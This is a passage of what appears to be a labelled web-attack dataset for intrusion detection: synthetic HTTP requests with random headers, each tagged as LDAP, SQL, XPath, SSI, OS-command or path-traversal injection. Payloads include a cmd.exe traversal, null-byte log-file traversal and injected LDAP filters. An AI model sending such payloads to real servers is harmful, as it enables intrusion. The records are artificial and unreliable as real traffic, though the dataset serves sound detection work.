MIME-Version: 2.1
Pragma: das2eea='eht'
Proxy-Authorization: Basic ZG5rZUE6aTh1cw==
Authorization: Digest uri=http://www.n4umi.ch/eegig8h.swf
Range: -012
Referer: /sznts/lktet/aioh/mEot/aahv8e.jpeg
TE: trailers,chunked,trailers
Trailer: Authorization
User-Agent: zS9wHRXGu http://www.cihi.fr
UA-CPU: Sparc
UA-Disp: 4263,349,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 527x1451
Via: FTP/6.6 221.185.154.74, HTTP/2.7 46.208.240.221
Transfer-Encoding: identity
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 607 37.136.158.28 "s5ntidssyngee" "Wed, 07 Sep 05 11:09:31 UTC"
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49486
Start - Id: 37119
class: LdapInjection
GET /qy/d7wE_CaPZh.WD/keno.shtml?o82nnalf=MiOs56p0mge&slo=hONaa%29%28%26%28objectClass%3D++++oz9*%29 HTTP/1.0
Host: www.hmdl.cz
Connection: vxye
Accept: application/*;q=0.0, application/rtf;q=0.6, image/*;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.6, identity;q=0.1
Accept-Language: *
Cache-Control: max-stale=2
Client-ip: 116.227.6.28
Cookie: gZFC6UERDR=uyni;;itoi9=e&;Eldhn=ehseaUe4ltlri;ei3oa8l0ktaa=45837758
Cookie2: $Version="74"
Date: Mon, 22 Nov 04 05:09:47 CET
ETag: "TmD0qTaJ19HIJ8S"
Expect: 100-continue
From: ke6iat@otEmem.org
If-Modified-Since: Fri, 21 Mar 08 20:24:41 GMT
If-Unmodified-Since: Tue, 17 Aug 04 03:13:44 GMT
If-Match: "ERNyZeAE62yHcTnzMakT"
If-None-Match: *
If-Range: "bthC@e0eZ2O04DKXg"
Max-Forwards: 0617
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: NTLM ZWF5T29lRTJmaG1yZ2kzZW1zWW5oZm8zYXRiZGxhZWFl
Range: -5173
Referer: http://www.90sfjqer.cz/zEnt4edt/Paleo/DXt3iao3/omor/62eTica.png
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/0.0 (compatible; MSIE 5.2; Windows NT; ntceae1t5; exqaabt)
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 617x3755
Via: HTTP/5.1 www.ydbno6Sg.css, 1.6 20.94.179.45, 8.9 53.204.116.100
Transfer-Encoding: deflate
Upgrade: tRvc9/2.0
Warning: 296 92.253.127.230:14 "0shhdnca" "Sun, 22 Feb 04 22:26:45 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 4738976742686812
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37119
Start - Id: 37408
class: LdapInjection
GET /brytcw/mOT3hH/iT_ao-t.5Nuy/Wusiss4laalkl/eIUb8iSr/dphuiaenufiijaotdh/tA8.aspx?2sh=5097&W1mp=xtermnose5nt&mLtmmrsasvz=e4i7ygRgolaemlStgi&8hf=5119190&ky0QdlNdD=eBxoBY&xEloc=kart%3C1xe HTTP/1.1
Host: www.jrsPeeqeA.com:5184
Connection: sabnotu
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.7, gzip, compress
Accept-Language: *
Cache-Control: rrmpK='sAldhuiW'
Client-ip: 112.62.22.134
Cookie: ltT7eateittlie=h74I;RaiTldniohkcL=)  (   |    (    cn=*o 'brien*)(mail    =*o    'brien* )   ;la=6085975581;hRAaitbTna=938430
Cookie2: $Version="84"
Date: Fri, 16 Apr 10 11:40:05 CET
ETag: "XD5I.lskin7RRYarIK1"
Expect: 100-continue
From: 3ear@vimqehoae.fr
If-Modified-Since: Fri, 10 Jul 09 08:36:34 CET
If-Unmodified-Since: Thu, 30 Dec 04 17:19:32 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 479
MIME-Version: 8.7
Pragma: Rinibg=ntcotY
Proxy-Authorization: Digest algorithm=MD5
Authorization: wqA8Ir sa7ahs9=pksae
Range: 082112-540,03898-739302,66-304
Referer: /eedEteq/hro1e/gc9ttttC/srbq/ehorAhy8.tiff
TE: chunked
Trailer: Accept-Language
User-Agent: Mozilla/5.0 (compatible; ss9v8; Unix; fayneueru; elaELd; 2ti0)
UA-Disp: 143,2118,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 005x049
Via: 4.6 www.32eot7.htm, FTP/6.1 70.224.164.214
Transfer-Encoding: identity
Upgrade: sdkeds/7.2, acodv8/1.5, netitb/9.6
Warning: 484 162.210.1.122:4855 "Sno4bUackumklest" 
X-Forwarded-For: 165.215.42.96
X-Serial-Number: 50103674881121
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37408
Start - Id: 43823
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 225.174.109.90
Connection: keep-alive
Accept: audio/basic
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 110.26.184.172
Cookie: uxntiwt7dcD=5660282689;ooeInteisei=oezdnom/h;oesi5flhh=spea;up=oDE;stlhl=ruB+maile7kconnectq
Cookie2: $Version="513"
Date: Sun, 27 Apr 08 10:24:02 UTC
ETag: W/"-MJfZJF0gHAQgRUgxoJi"
Expect: 100-continue
From: nNdc@ioesest.fr
If-Modified-Since: Fri, 09 Jul 04 02:07:55 UTC
If-Unmodified-Since: Fri, 14 Nov 08 23:23:36 GMT
If-Match: "OAeiJS.lb_lP-QM"
If-None-Match: "7s7SRKbQkuCuL9ogF_P."
If-Range: Fri, 06 Apr 07 03:37:59 GMT
Max-Forwards: 724
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: nhtAee iSca=rh9xakc
Range: 7246-,-7950
Referer: /weeaGwt/cAdkiat/0oento.pl
TE: deflate
Trailer: Accept
User-Agent: mnxJLN http://www.6nnesr.it
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6925x167
Via: 7.3 www.eohnR.tiff, 5.2 88.65.214.58
Transfer-Encoding: compress
Upgrade: elhc/1.1, pcie/0.4, dnaa/6.7, adtya9/8.8, n0MysO/8.8
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 179501201
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43823
Start - Id: 40965
class: SSI
PUT /VcslHvWRNr.bv/05sPDjBWiLc1WXW1Jn/ej@ns2bJ1Lk91.png? HTTP/1.1
Content-Length: 297
Content-Language: enoarh8j,n
Content-Encoding: deflate
Content-Location: http://www.niiep.it/c3aoeil/eSj9l/sotr7/noyip6h/te8njafu.bin
Content-MD5: SXV0ZWVzcjVmd2doZW9oeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 16 Aug 08 08:33:52 CET
Last-Modified: Fri, 17 Sep 04 10:35:27 GMT
Host: 61.24.119.100
Connection: keep-alive
Accept: application/*;q=0.2
Accept-Charset: x-mac-turkish
Accept-Encoding: deflate;q=0.0, deflate, identity;q=0.2, identity;q=0.1
Accept-Language: n-U;q=0.2, xf-ue;q=0.6
Cache-Control: no-store
Cookie: m6lCne1einaeRmw=waaqtmq9s;muete3=1;IdGfdoadahsya=230;uareolsrth=hLD_WGriBtFG;eeHie=<!--#odbc statement    =  "select     Ga2eusn,   r0E,  oo  from  toer8     order  by    5,  967,  7"     -->;tiohtt=9
Cookie2: $Version="56"
Date: Sun, 07 Mar 10 15:08:32 GMT
ETag: W/"SW16dEtP61Xm@eaVGdp"
Expect: roay8d=wtrfnol
If-Modified-Since: Mon, 09 Feb 09 21:05:15 UTC
If-Unmodified-Since: Mon, 22 Feb 10 04:02:46 GMT
If-Match: *
If-Range: *
Max-Forwards: 76
MIME-Version: 4.2
Pragma: oe=riW
Authorization: aoAFh i1et=ejhsw5t
Range: -1
Referer: http://www.movO.net/i7ncnel/00mleal/lda9hrf8.php3
Trailer: Expect
User-Agent: Mozilla/5.8 (Windows; U; Win 9x 4.0; hr-ht; rv:3.2.5) Gecko/05238172
UA-Color: color16
Via: 0.9 www.tybmcL.jpg:98
Transfer-Encoding: deflate
Upgrade: tnrn/8.3, Tpo/9.5, noyBao/0.0, aeoa/8.2

mnrvnonslesarb=209610&hamtnfroo=01908&aD.iyrm6_8-services=solinkoform3)n&prU0ehYexarswlo=iylmsyvicojenyi&tZo0i2yysup=1994084&i3iiddamcil3a=bDsq1T&ERFWGxp_b1Z=5152&LetMoz=657&sonru=tkaqbpejniyeedph&JorXE3=sqerwo9&dgc7f=s2i( o&arocfyErcat=pandekleE&D3sdutM=iijidaomMnih'&Nlhttp7fromILu95B=n7kt

End - Id: 40965
Start - Id: 45938
class: PathTransversal
GET /nhjlcweteuaEoxemn/zlt0zlnmyroa7s/JjzxIXRXs/ZmzRtmpK0dox2orV/ogB0L@m297Z3aLDsMKBc/hbv7wRsqNre.html?ocwnnl=k%3A%5Cwindows%5Cboot.ini&ojfsiSabn=+&tny0n4Eladtibeo=mhengNsekbegecd&avr=unrt%27&evdej=343&dyn=dcij HTTP/1.1
Host: www.vsoos.uk
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 97.149.89.41
Cookie: roIei5aDelh=kBc%;gobatcaotsa=ziAe;tssLthmr=0855
Cookie2: $Version="3"
Date: Sun, 23 May 04 02:54:28 GMT
ETag: "I-1Vu8lJh1NeMa7Y"
Expect: 100-continue
From: ba5dren@nteitjeEal.cz
If-Modified-Since: Sun, 22 Apr 07 13:18:49 GMT
If-Unmodified-Since: Sat, 05 Jan 08 13:41:05 UTC
If-Match: "EQWmnei0LO_g.ed7f"
If-None-Match: "sAOteTtLYV3R0.hp1g"
If-Range: Sun, 28 Dec 08 01:00:32 UTC
Max-Forwards: 7656
MIME-Version: 1.3
Pragma: oahN7ly=f
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Hh8ljl hkHpI=asiyO
Referer: /rotTg1i/eriyt/onl4zs/Cosdrgoi/rchr8t.tiff
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/7.9 (X11; U; SunOS sun4u 6.6; tr-rf; rv:4.5.7) Gecko/57462532
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
Via: HTTP/1.3 174.175.247.217, 7.9 www.vVPeiaE.tiff, ezqew/1.1 www.f8fbaind.shtml:33
Transfer-Encoding: telre
Upgrade: nstsgn/3.1
Warning: 301 www.foehiLHu.gif "dqnsc" 
X-Serial-Number: 15666151508879935432
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45938
Start - Id: 36290
class: PathTransversal
GET /sZYoH.xnMnwgH/hoj/gU4bujsuQaQNwAMUrxa6/5iLenu/servicesCQpsewlWubKNuO/iB8F8umL3I0bOgl25Ji/31/mailFsock_streamv/e7YNaedgho6uRoftt4a/9RbcBeEMr6dsA/el/jrvE.css?r66hgb0stxl6ms=tIUNWiE&Hh=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&ssdr=aad0wgetidgr+%2Bgt%24&vd=sciw&hlt=39803484 HTTP/1.1
Host: 157.230.248.195
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-roman, windows-1251;q=0.6, gb2312
Accept-Encoding: 
Accept-Language: auoy9a-t;q=0.7, 5iH-533iraa;q=0.9, DtnndToB-ntdhIb, netl-wir;q=0.5
Cache-Control: no-store
Client-ip: 114.100.144.6
Cookie: 8iitiR1=t=%sek]zIcbgsoundtU>a sock_streamr
Cookie2: $Version="483"
Date: Fri, 10 Dec 04 15:36:55 CET
ETag: "9as6V4Gtf64Xu1_Hj"
Expect: 100-continue
From: dtehsE@fwehd4rfrs.com
If-Modified-Since: Fri, 17 Sep 04 07:37:11 CET
If-Unmodified-Since: Fri, 04 Sep 09 23:19:52 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 22 Dec 09 07:08:07 CET
Max-Forwards: 882
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: NTLM aXVmc2llbjJSZ2VvSGVlc2wwdW90N2FvYWV6ZXRyYWg=
Authorization: NTLM cmE0b1luZW1udHJiaWNkNW50ZWpvaW42dGVhbTJpYWhu
Range: 48895-751657,65-
Referer: /ssgDLra/eq5gNoan/rrne/xs1n3.nsf
TE: trailers
Trailer: Accept-Encoding
User-Agent: etyhoaasis (efZ7SO51)
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: FTP/1.4 230.138.217.243, FTP/1.8 207.183.201.110, 3.2 215.172.81.107
Transfer-Encoding: compress
Upgrade: ye1nNS/5.5
Warning: 517 www.aoior0c.tiff:33767 "TpadeIe" 
X-Serial-Number: 50534394193049437616
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36290
Start - Id: 39062
class: LdapInjection
PUT /k.Gbetween.asmx? HTTP/1.0
Content-Length: 247
Content-Language: h7
Content-Encoding: compress
Content-Location: /eeByR/ot45/traiet0.wmn
Content-MD5: dmFmZG8wdGFFbXpra25oYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 22 Dec 07 03:19:22 GMT
Last-Modified: Thu, 18 Jun 09 03:20:51 GMT
Host: www.aret4l.it
Connection: oItio5
Accept: */*;q=0.4
Accept-Charset: shift_jis, x-mac-roman, x-mac-chinesetrad;q=0.9, windows-1257
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=409
Client-ip: 48.137.231.218
Cookie: abao3Tebn5pan=")(targetfilter=(o=NetscapeRoot))
Cookie2: $Version="5"
Date: Tue, 20 Jul 04 11:50:28 CET
ETag: W/"LBtbxCRGxYe2DWQsLpli"
Expect: 100-continue
From: icaden@piqhAfS1E.uk
If-Modified-Since: Thu, 10 Nov 05 23:55:31 UTC
If-Unmodified-Since: Thu, 23 Feb 06 07:11:36 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Apr 08 17:17:52 CET
Max-Forwards: 8157
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: usrL exto=oweCE
Authorization: Digest qop=auth
Range: -436
Referer: /iwea/udgi/Xorzee.shtml
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: ttKGana/4.5.2.6
UA-CPU: PowerPC
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0434x6105
Via: WtxYa/8.7 www.ertc.html, tdEik/4.7 www.n9ndx.png, HTTP/2.6 95.157.135.107
Transfer-Encoding: 66tto; 6lrcHda=gyecft
Upgrade: AoeT/2.5, uic/2.7, Eiudri/3.6, l7gN/4.2
Warning: 030 103.121.67.250 "ereFagttoerTnEa" 
X-Serial-Number: 53018392304378
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rnYi6p=laf>egt|uh1&eabntrsuaLoine=winntaawpch8eLr=u5A&Alrc8i=dtp7Eahr&aajmlteE=znApw1etlds&adminmCS342lTfz=ww0aapex&theaao=8ht&xr=ea ge&esn5dnwetied=s2YyS2LTV&s4=16&rosu4=456166340&oshEo8tt4ca=hpflse&sser=kn4u&4ioaidcini=A&-y8edocument=tdrXo

End - Id: 39062
Start - Id: 38013
class: LdapInjection
GET /aHCk0Gw0Wh9ZL4rWUe/typQ0q/Li/eve4ofgtieaeoi/aaswtlrfWshetTEeelne/dre8n1peh7pue/p5C3he/dbaapwrrt/awfiHEeepsth/vm5m5cc6RSowNaL.cfm?nuion=%29+++%28+++%7C+++%28+++cn%3D*o++++%27brien*++%29%28mail%3D*o%27brien*%29++++&hDGSpnsca=nrp%29als%3E&thj8NbEndufa=+l3ct&unYmgldxs=rje5L&irlanco=++-%3B&fiyOhfxecdtjlrm=95&rtv=yOmgtsa&lsecoga3=ki HTTP/1.0
Host: www.tism.st
Connection: 8wus
Accept: application/*;q=0.5
Accept-Charset: windows-1258, iso-2022-kr;q=0.2
Accept-Encoding: *
Accept-Language: ho-Acge, sainj2i-kNh;q=0.5, obuntn-mhtg;q=0.8
Cache-Control: no-transform
Client-ip: 204.64.18.91
Cookie: taNpnti8Aequey=hsg;2Tpnhenebtsh=0986504;arwiOadi=ceinullans;aaef8mowcjtG=eI
Cookie2: $Version="804"
Date: Sat, 26 Jan 08 13:26:10 GMT
ETag: "zGwbkaD56y2_UjA"
Expect: hAenvtnw
From: 8nlhbept@3gle.ch
If-Modified-Since: Thu, 19 Mar 09 14:10:48 UTC
If-Unmodified-Since: Fri, 10 Jun 05 21:03:45 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 21 Mar 08 24:38:54 CET
Max-Forwards: 2406
MIME-Version: 8.2
Pragma: dsier=iphxe
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: NTLM b2VudUVwaGV0dTRwb2V0Z3RIaW84YXRlZTFybWltaVRyQThvZXRn
Range: 28-,220237-8,8-
Referer: http://www.a5ud0rlu.de/auarrem/cerg/ssau/kTni/saEls1w.php3
TE: deflate;q=0.8
Trailer: If-None-Match
User-Agent: Mozilla/6.9 (Windows; U; Win98 6.2; Nt-A3; rv:9.2.0) Gecko/78897561
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 905x8185
Via: FTP/4.4 www.le6gn.html, swktd/1.5 www.EW4tetl.jpeg
Transfer-Encoding: gzip
Upgrade: obs/0.4, gbr/5.8
Warning: 461 www.3izrso.tiff "rrcdd92qh0Axrii" 
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38013
Start - Id: 49532
class: XPathInjection
GET /9amttr/cWyn_z3hbn/4l4Xzj/AnE1n96A4tfaerolm/o8bidaraepoe/NnThsmxc/sG/dfUS7@tfGSI/VnullpP@TbM/7529CTwbgsoundz/d4afpnW5uesf.js?Yqgsai=e7s%27++++or++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28++i+++%2B++j%2Bk++++%2B++l+%2B1%29%5D+++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++%27crti6far%27++%3D+%27+r9FemSl%27+++++or&seisE0ng=LmAcopywnpHfn&IskEo6ismlAdn=vx&ferriaqrnedhar=e3e6&obrrkdgAhtne99n=ste3&ZPR5e.MI-=+1&A9AzV1Letcb=005571497&acpgrhiee=%2Fewvs&3Tn=c&EtodYhel7s=1232&ahh=G&etxg5ar=959139373 HTTP/1.0
Host: www.mdei2e.org
Connection: upTT
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: aiety-h17e;q=0.0, thafta8l-teuemsis
Cache-Control: max-age=69231
Client-ip: 91.134.19.242
Cookie: onc2oof=ises/tRn8iott
Cookie2: $Version="18"
Date: Sat, 19 Apr 08 23:58:48 UTC
ETag: "pUBVRGni3kIAQ_BM_qDc"
Expect: Set5qe
From: teetaaso@eakeiyqkca.gov
If-Modified-Since: Tue, 18 Jul 06 16:11:59 UTC
If-Unmodified-Since: Thu, 03 Mar 05 08:38:21 GMT
If-Match: "itWx1sIPDtP89K0VoC6"
If-None-Match: "kAxwiNt-5bsypFbqyV"
If-Range: *
Max-Forwards: 1
MIME-Version: 4.3
Pragma: Nn5d7e=e
Proxy-Authorization: ae9cy3 mcawsh6=6imqoMWi
Authorization: NTLM c2RlbGl0Y1NObHJ0bmljZVVhdG5nbmxpaE5zZHNUbW9naTVlb25ubg==
Range: 515-482
Referer: /eoi5v/tselu/koqay5l/t4oo.js
TE: deflate;q=0.5
Trailer: Connection
User-Agent: 8jCn94 http://www.Laec.it
UA-CPU: x86
UA-Disp: 2924,8513,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 661x844
Via: HTTP/3.0 www.eMww.jpeg:8908
Transfer-Encoding: gzip
Upgrade: 7o6mn6/1.4, twjeP/1.1, eevzn/6.2
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 1653383151363869
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49532
Start - Id: 38661
class: LdapInjection
GET /reiLe/aGMvCcopybqb.cfm?mt=%27doliautoexect7Nb&62oipn5ofy7=pnsN&ZBz13nkQoRZ=caxeiDLg5t&tqexgeozhd4Ee=45706&e5jeaFs=Ot0oynri2c&h9Wincludee8K=%29++%28+++%7C++%28ddeat%3Deojl9*%29&qaeidAt2etrnu8=bC+tgk&enoa=R8edazu9v&r0Annrgyl=emstpf9tnOeeon8ola&edeIu=e7Y&azmwctMetefe=adl%3DHtoiframe%28hearnri%3Bwmj HTTP/1.0
Host: www.lxLfhCol.st
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-2, hz-gb-2312, euc-jp;q=0.2, ks_c_5601-1987;q=0.3
Accept-Encoding: gzip, gzip, deflate;q=0.2, deflate, identity
Accept-Language: *;q=0.2
Cache-Control: max-age=895
Client-ip: 4.62.251.210
Cookie: 5bsectEct2r=060
Cookie2: $Version="896"
Date: Thu, 04 Mar 04 04:54:11 GMT
ETag: W/"NDTNAThFdSCA-p."
Expect: aero=c3tei1ta;Aetl
From: 0dbnE@pDEweao.biz
If-Modified-Since: Sun, 03 Jun 07 24:33:36 GMT
If-Unmodified-Since: Fri, 28 Nov 08 06:25:28 UTC
If-Match: "i2_F0a4e2c5IzbPhvDg"
If-None-Match: "aQporVpJiu_M_E7c27fM"
If-Range: Thu, 09 Aug 07 09:47:04 UTC
Max-Forwards: 533
Pragma: no-cache
Authorization: 9oim btuerr=e4nf
Range: -3789,-5,300-00360
Referer: http://H5sv.gov/eoteb/adrnwM/elltoX/utlhrar3.swf
TE: gzip,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/0.6 (X11; U; Open BSD i586 1.8; de-io; rv:4.4.1) Gecko/94161202
UA-OS: Solaris
Via: 1.3 136.98.143.241:3
Transfer-Encoding: gzip
----: -----------------

null

End - Id: 38661
Start - Id: 36246
class: PathTransversal
GET /dFwnMrX/ib-_xpAy6e/sdctnaihmEeuewgpt7be/a3kfHKSwR3qq9/ssidlwehe1esennn7n.js?EDzRn2=gmn0nx&asaoiiomo=eit&RNohnds2=epConXED&ooohe3gabjorn6l=%7EbinEs+%3C&iEY6ND0W_Nq=hrtye&TsnajpAhuNy=8&ssmimoStbeu1=evxz&xTil8P=diq0e%29fvbrap HTTP/1.1
Host: 162.138.122.199:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, identity
Accept-Language: *;q=0.4
Client-ip: 146.162.66.142
Cookie: aaImiaSarMIsej=33;jhax=dnn;GHg_MoWdfhaving=../../../../var/log/access_log%00.html
Date: Wed, 06 May 09 24:43:09 CET
From: gnun@ooTeaotBtr.de
If-Modified-Since: Sat, 27 May 06 16:53:21 GMT
If-Range: "FaoFbE_KMpr6KMsx"
Max-Forwards: 79
Authorization: q6aes oNgr=t7EO
Referer: /bhzt.asp
User-Agent: Mozilla/4.8 (Windows; U; Win 9x 4.0; ct-ie; rv:3.0.6) Gecko/09766229
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36246
Start - Id: 42562
class: SqlInjection
GET /ew4BFeTHV.emid/erepIbyrndfxuftsyat/dda/3.Av_/jr8oT9JE/0rtl/Ns/oP/BC3/_yMsselectoVv8p/ecpousmebptutgelmdbU.cgi?8qm3C9rD_MF=qwer%27+++or++++oera_v.Account%3D%27tnA%40sN.com&xFF8Oogroup byP=rppklky&acqmmdedu=c57Fc1&ed9ioitehbSt=%3Ecn5iii1+i+Laccess_logs&sze=81&tlmuir0rnenWs=8&6Mtcooe6i2utanu=%2B+l HTTP/1.0
Host: www.t0risSsg.ch
Connection: ttWf
Accept: */*
Accept-Charset: iso-8859-4;q=0.5, windows-1250;q=0.5, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2262
Client-ip: 64.211.9.213
Cookie: QotiEaOctra9dm=eZisZOD91FKC;H7u9oshensttn7=?t;qemo1toeont=23479614;6eterE=552
Cookie2: $Version="79"
Date: Sun, 02 Jan 05 17:56:42 CET
ETag: "TraGuu_QjplOnZR"
Expect: shrot
From: spods@kyeiscew.net
If-Modified-Since: Sun, 17 Aug 08 15:50:10 UTC
If-Unmodified-Since: Fri, 20 Jul 07 07:24:16 CET
If-Match: *
If-None-Match: "_KbjtWBMwwQAIu-xBqA"
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 6101
MIME-Version: 8.8
Pragma: ii='6EaE'
Proxy-Authorization: Basic b2VsbjY6T2hUZ2Vv
Authorization: Basic YnRydGFoOml0ZW1w
Range: -05,8037-,228664-
Referer: http://www.eeAeR.be/iOnlleo/teiI/atrnbt.wav
TE: chunked,trailers,gzip;q=0.6
Trailer: Expect
User-Agent: Mozilla/0.8 (compatible; Konqueror/5.8; Win98; bhsqd)
UA-CPU: MIPS
UA-Disp: 1891,2562,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 161x8196
Via: 1.4 www.6snf.jpeg, HTTP/3.6 www.shqtda.htm
Transfer-Encoding: compress
Upgrade: idlsll/7.2
Warning: 932 195.72.254.121:53 "lnpgreue" "Fri, 16 Oct 09 14:01:22 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42562
Start - Id: 37188
class: LdapInjection
GET /d5l4snSEnvnbuugee4/ecoaLUQN5dz7hs604O1/o4i3orFhP@49ivi/yistt8Tqwdim4c/telnet2O-echoBwhere/5tA/hJxMohiNCltC5yF0.js?pheprlf9=etamr&oom=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&henhellc=nauaimgaceapep&esreaeslkd9=l+3a%27cat%2Fr&rttmfr2hqey1j=irjUJQR_Xt6&ryfelTemceEie=4338&hssbcasse6sni=pPjL&xtemagunhJnn=2 HTTP/1.1
Host: www.Doqi.uk:2
Connection: keep-alive
Accept: application/zip, audio/basic;q=0.1, video/*
Accept-Charset: cp-950;q=0.0, cp-936, x-mac-roman, ks_c_5601-1987;q=0.6
Accept-Encoding: *;q=0.6
Accept-Language: rrim-5b7edhvi;q=0.1, ijxi-tarsc, guo-odIaarrb, e0nS7ne-co;q=0.0
Cache-Control: no-transform
Client-ip: 45.223.151.51
Cookie: nsinet55O=h5vcNheG
Cookie2: $Version="2"
Date: Wed, 06 Oct 04 24:40:01 CET
ETag: "gWkihjapRYwi3oCzZ"
Expect: sgdaie
If-Modified-Since: Mon, 19 Oct 09 17:17:15 GMT
If-Unmodified-Since: Sun, 02 Nov 08 12:47:58 CET
If-Match: "fkv@1.SCwBqyLLIEcte"
If-None-Match: *
If-Range: Wed, 14 Sep 05 03:31:26 UTC
Max-Forwards: 0
MIME-Version: 6.5
Pragma: 4a=9
Authorization: iai0nd 4nyszpea=dnbr
Range: 3385-,6968-,40-033
Referer: http://www.alrPae4a.fr/avsnen/thig7Ee.asp
TE: trailers,chunked,chunked
User-Agent: Mozilla/7.2 (compatible; Konqueror/0.6; Unix; inRtii; yfia; PrisdhO7r)
Via: FTP/9.7 www.levx8zb.tiff:83
Transfer-Encoding: identity
Warning: 049 www.snrd.js "elEedMobfonU" 
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37188
Start - Id: 43899
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.1
Host: 88.132.76.181:42294
Connection: close
Accept: image/gif;q=0.2, video/*, audio/x-wav
Accept-Charset: macintosh;q=0.6
Accept-Encoding: *;q=0.6
Accept-Language: e-yt;q=0.6, l-r;q=0.7, mhvlibsd-rri
Cache-Control: min-fresh=72674
Client-ip: 148.75.122.55
Cookie: iauZteY6q=886;he=dw6raatNb;pgyetteqaf3r6=r1~at;0otndXotbOw=8itslws4;oqeaoo8=8612357245
Cookie2: $Version="6"
Date: Fri, 01 Dec 06 20:30:10 GMT
ETag: "Ep17MfiXz7naL9aGqdZ"
Expect: 100-continue
From: pni8hEt@brlOo.ch
If-Modified-Since: Tue, 16 Dec 08 08:30:22 UTC
If-Unmodified-Since: Mon, 15 May 06 11:36:12 UTC
If-Match: *
If-None-Match: "YPxlz7._xFR2j-Bam"
If-Range: "K6OVcQeIC12Aj7ZG"
Max-Forwards: 0
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM dGxFdHRpbnNuZXRwZmlwU2NjcGVucmk5bWFkbXFhbGhlb2FmZQ==
Authorization: Basic YnJ5cnNuaWE6d3doZWY=
Range: 3121-127,822-
Referer: /aatgbx/ndlbnila/Tt34wah.css
TE: chunked;q=0.2,chunked;q=0.2,gzip
Trailer: If-Match
User-Agent: nihfsihrns (iwl8k0nD; awZ2OAHLQ3; l263xbO3; nIJlaKPV; eh7rGq)
UA-CPU: StrongARM
